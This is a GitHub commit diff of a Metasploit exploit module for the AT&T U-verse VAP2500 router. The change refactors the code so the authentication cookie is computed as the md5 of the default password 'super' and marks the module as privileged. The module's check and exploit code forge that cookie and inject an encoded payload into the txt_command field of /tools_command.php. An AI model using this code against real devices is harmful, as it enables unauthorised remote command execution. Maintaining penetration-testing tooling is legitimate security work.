File tree Expand file tree Collapse file tree 1 file changed +4
-7
lines changed
modules/exploits/linux/http Expand file tree Collapse file tree 1 file changed +4
-7
lines changed Original file line number Diff line number Diff line change @@ -35,7 +35,7 @@ def initialize(info = {})
35
35
[ 'URL' , 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/' ]
36
36
] ,
37
37
'DisclosureDate' => 'Nov 25 2014' ,
38
- 'Privileged' => false ,
38
+ 'Privileged' => true ,
39
39
'Payload' =>
40
40
{
41
41
'DisableNops' => true ,
@@ -53,9 +53,7 @@ def check
53
53
res = send_request_raw ( {
54
54
'method' => 'GET' ,
55
55
'uri' => '/tools_command.php' ,
56
- 'headers' => {
57
- 'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca" , # md5("super")
58
- }
56
+ 'cookie' => "p=#{ Rex ::Text . md5 ( 'super' ) } "
59
57
} )
60
58
if res && res . code == 200 && res . body . to_s =~ /TOOLS - COMMAND/
61
59
return Exploit ::CheckCode ::Vulnerable
@@ -88,10 +86,9 @@ def exploit
88
86
'txt_command' => "echo #{ beg_boundary } ; #{ payload . encoded } ; echo #{ end_boundary } "
89
87
} ,
90
88
'method' => 'POST' ,
91
- 'headers' => {
92
- 'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca" , # md5("super")
93
- }
89
+ 'cookie' => "p=#{ Rex ::Text . md5 ( 'super' ) } "
94
90
} )
91
+
95
92
if res && res . code == 200 && res . body . to_s =~ /TOOLS - COMMAND/
96
93
print_good ( "#{ peer } - Command sent successfully" )
97
94
if res . body . to_s =~ /#{ beg_boundary } (.*)#{ end_boundary } /m
You can’t perform that action at this time.
0 commit comments